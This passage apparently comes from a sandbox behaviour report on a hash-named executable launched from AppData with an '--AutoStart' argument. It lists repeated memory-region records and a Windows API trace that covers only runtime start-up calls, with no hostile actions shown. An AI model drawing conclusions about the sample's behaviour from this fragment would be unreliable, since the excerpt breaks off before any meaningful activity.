entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2861 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2862 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2863 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2864 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2865 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2866 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2867 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2868 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2869 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2870 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2871 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2872 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2873 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2874 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2875 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2876 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2877 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2878 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2879 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2880 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2881 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2882 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2883 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2884 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2885 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2886 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2887 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2888 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2889 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2890 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2891 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2892 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2893 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2894 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2895 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2896 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2897 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2898 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2899 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2900 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Thread: id = 123 os_tid = 0x7e0 [0172.259] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff78 | out: lpSystemTimeAsFileTime=0x18ff78*(dwLowDateTime=0xd4dd1380, dwHighDateTime=0x1d8a8b9)) [0172.259] GetCurrentThreadId () returned 0x7e0 [0172.259] GetCurrentProcessId () returned 0x7dc [0172.259] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff70 | out: lpPerformanceCount=0x18ff70*=1515191228964) returned 1 [0172.415] GetStartupInfoW (in: lpStartupInfo=0x18ff08 | out: lpStartupInfo=0x18ff08*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\kEecfMwgj\\AppData\\Local\\4d45d74b-b67c-4b05-9c99-9061295dc2fa\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x7731fd35, hStdError=0x77387daf)) [0172.444] GetProcessHeap () returned 0x620000 [0172.505] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75cd0000 [0172.505] GetProcAddress (hModule=0x75cd0000, lpProcName="FlsAlloc") returned 0x75ce4ee3 [0172.507] GetProcAddress (hModule=0x75cd0000, lpProcName="FlsFree") returned 0x75ce354f [0172.507] GetProcAddress (hModule=0x75cd0000, lpProcName="FlsGetValue") returned 0x75ce1252 [0172.507] GetProcAddress (hModule=0x75cd0000, lpProcName="FlsSetValue") returned 0x75ce41c0 [0172.507] GetProcAddress (hModule=0x75cd0000, lpProcName="InitializeCriticalSectionEx") returned 0x75ce4ce0 [0172.507] GetProcAddress (hModule=0x75cd0000, lpProcName="CreateEventExW") returned 0x75d646ab [0172.507] GetProcAddress (hModule=0x75cd0000, lpProcName="CreateSemaphoreExW") returned 0x75d64735 [0172.507] GetProcAddress (hModule=0x75cd0000, lpProcName="SetThreadStackGuarantee") returned 0x75ced2d7 [0172.507] GetProcAddress (hModule=0x75cd0000, lpProcName="CreateThreadpoolTimer") returned 0x75cfee4e [0172.508] GetProcAddress (hModule=0x75cd0000, lpProcName="SetThreadpoolTimer") returned 0x7734441c [0172.508] GetProcAddress (hModule=0x75cd0000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x7736c50e [0172.508] GetProcAddress (hModule=0x75cd0000, lpProcName="CloseThreadpoolTimer") returned 0x7736c381 [0172.508] GetProcAddress (hModule=0x75cd0000, lpProcName="CreateThreadpoolWait") returned 0x75cff058 [0172.508] GetProcAddress (hModule=0x75cd0000, lpProcName="SetThreadpoolWait") returned 0x773505d7 [0172.508] GetProcAddress (hModule=0x75cd0000, lpProcName="CloseThreadpoolWait") returned 0x7736ca24 [0172.508] GetProcAddress (hModule=0x75cd0000, lpProcName="FlushProcessWriteBuffers") returned 0x77320b8c [0172.508] GetProcAddress (hModule=0x75cd0000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x773dfde8 [0172.508] GetProcAddress (hModule=0x75cd0000, lpProcName="GetCurrentProcessorNumber") returned 0x77371e1d [0172.508] GetProcAddress (hModule=0x75cd0000, lpProcName="GetLogicalProcessorInformation") returned 0x75d64d01 [0172.509] GetProcAddress (hModule=0x75cd0000, lpProcName="CreateSymbolicLinkW") returned 0x75d5d181 [0172.509] GetProcAddress (hModule=0x75cd0000, lpProcName="SetDefaultDllDirectories") returned 0x76ae208a [0172.509] GetProcAddress (hModule=0x75cd0000, lpProcName="EnumSystemLocalesEx") returned 0x75d647ef [0172.509] GetProcAddress (hModule=0x75cd0000, lpProcName="CompareStringEx") returned 0x75d64c51 [0172.509] GetProcAddress (hModule=0x75cd0000, lpProcName="GetDateFormatEx") returned 0x75d76c26 [0172.509] GetProcAddress (hModule=0x75cd0000, lpProcName="GetLocaleInfoEx") returned 0x75d64cf1 [0172.509] GetProcAddress (hModule=0x75cd0000, lpProcName="GetTimeFormatEx") returned 0x75d76ba1 [0172.509] GetProcAddress (hModule=0x75cd0000, lpProcName="GetUserDefaultLocaleName") returned 0x75d64d61 [0172.509] GetProcAddress (hModule=0x75cd0000, lpProcName="IsValidLocaleName") returned 0x75d64d81 [0172.509] GetProcAddress (hModule=0x75cd0000, lpProcName="LCMapStringEx") returned 0x75d64d91 [0172.509] GetProcAddress (hModule=0x75cd0000, lpProcName="GetCurrentPackageId") returned 0x0 [0172.510] GetProcAddress (hModule=0x75cd0000, lpProcName="GetTickCount64") returned 0x75cfeeb0 [0172.510] GetProcAddress (hModule=0x75cd0000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0172.510] GetProcAddress (hModule=0x75cd0000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0172.510] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x3bc) returned 0x63f4a8 [0172.510] GetCurrentThreadId () returned 0x7e0 [0172.525] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x631e90 [0172.525] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x800) returned 0x63f870 [0172.525] GetStartupInfoW (in: lpStartupInfo=0x18fed8 | out: lpStartupInfo=0x18fed8*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\kEecfMwgj\\AppData\\Local\\4d45d74b-b67c-4b05-9c99-9061295dc2fa\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x425128, hStdOutput=0x12a6fd8d, hStdError=0x0)) [0172.525] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0172.525] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0172.525] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0172.526] GetCommandLineW () returned="\"C:\\Users\\kEecfMwgj\\AppData\\Local\\4d45d74b-b67c-4b05-9c99-9061295dc2fa\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe\" --AutoStart" [0172.526] GetEnvironmentStringsW () returned 0x640078* [0172.526] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb46) returned 0x640bc8 [0172.537] FreeEnvironmentStringsW (penv=0x640078) returned 1 [0172.561] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x511130, nSize=0x104 | out: lpFilename="C:\\Users\\kEecfMwgj\\AppData\\Local\\4d45d74b-b67c-4b05-9c99-9061295dc2fa\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\4d45d74b-b67c-4b05-9c99-9061295dc2fa\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe")) returned 0x8a [0172.561] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x13a) returned 0x641718 [0172.561] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x9c) returned 0x641860 [0172.561] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x3e) returned 0x6324b0 [0172.561] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x56) returned 0x641908 [0172.562] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x6e) returned 0x641968 [0172.562] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x78) returned 0x62fd50 [0172.562] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x62) returned 0x6419e0 [0172.562] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x30) returned 0x63b568 [0172.562] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x48) returned 0x637080 [0172.562] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x28) returned 0x63af60 [0172.562] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x1a) returned 0x63ed60 [0172.562] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x34) returned 0x631eb0 [0172.562] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x5c) returned 0x641a50 [0172.562] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x32) returned 0x641ab8 [0172.562] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x2e) returned 0x63b5a0 [0172.562] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x1c) returned 0x63ed88 [0172.562] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x12a) returned 0x641af8 [0172.562] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x7c) returned 0x641c30 [0172.563] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x36) returned 0x641cb8 [0172.563] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x3a) returned 0x6324f8 [0172.563] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x90) returned 0x641cf8 [0172.563] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x24) returned 0x63af90 [0172.563] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x30) returned 0x63b5d8 [0172.563] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x36) returned 0x641d90 [0172.563] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x48) returned 0x6370d0 [0172.563] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x52) returned 0x641dd0 [0172.563] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x3c) returned 0x632540 [0172.563] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0xd6) returned 0x641e30 [0172.563] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x2e) returned 0x63b610 [0172.563] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x28) returned 0x63afc0 [0172.563] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x1e) returned 0x63edb0 [0172.563] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x2c) returned 0x63b648 [0172.563] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x54) returned 0x641f10 [0172.563] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x52) returned 0x641f70 [0172.563] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x2c) returned 0x63b680 [0172.563] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x26) returned 0x63aff0 [0172.563] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x3e) returned 0x632588 [0172.563] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x24) returned 0x63b020 [0172.563] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x30) returned 0x63b6b8 [0172.563] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x8c) returned 0x640078 [0172.564] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x640bc8 | out: hHeap=0x620000) returned 1 [0172.753] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x800) returned 0x640110 [0172.767] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x80) returned 0x640918 [0172.767] GetLastError () returned 0x0 [0172.767] SetLastError (dwErrCode=0x0) [0172.767] GetLastError () returned 0x0 [0172.767] SetLastError (dwErrCode=0x0) [0172.767] GetLastError () returned 0x0 [0172.767] SetLastError (dwErrCode=0x0) [0172.767] GetACP () returned 0x4e4 [0172.767] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x220) returned 0x6409a0 [0172.767] GetLastError () returned 0x0 [0172.767] SetLastError (dwErrCode=0x0) [0172.767] IsValidCodePage (CodePage=0x4e4) returned 1 [0172.767] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fecc | out: lpCPInfo=0x18fecc) returned 1 [0172.779] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f994 | out: lpCPInfo=0x18f994) returned 1 [0172.791] GetLastError () returned 0x0 [0172.791] SetLastError (dwErrCode=0x0) [0172.791] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0172.804] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f718, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0172.804] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f9a8 | out: lpCharType=0x18f9a8) returned 1 [0172.804] GetLastError () returned 0x0 [0172.804] SetLastError (dwErrCode=0x0) [0172.804] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0172.804] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6e8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0172.817] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0172.817] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4d8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0172.818] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x18fca8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x1dü¦\x12äþ\x18", lpUsedDefaultChar=0x0) returned 256 [0172.818] GetLastError () returned 0x0 [0172.818] SetLastError (dwErrCode=0x0) [0172.818] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0172.818] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0172.818] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: 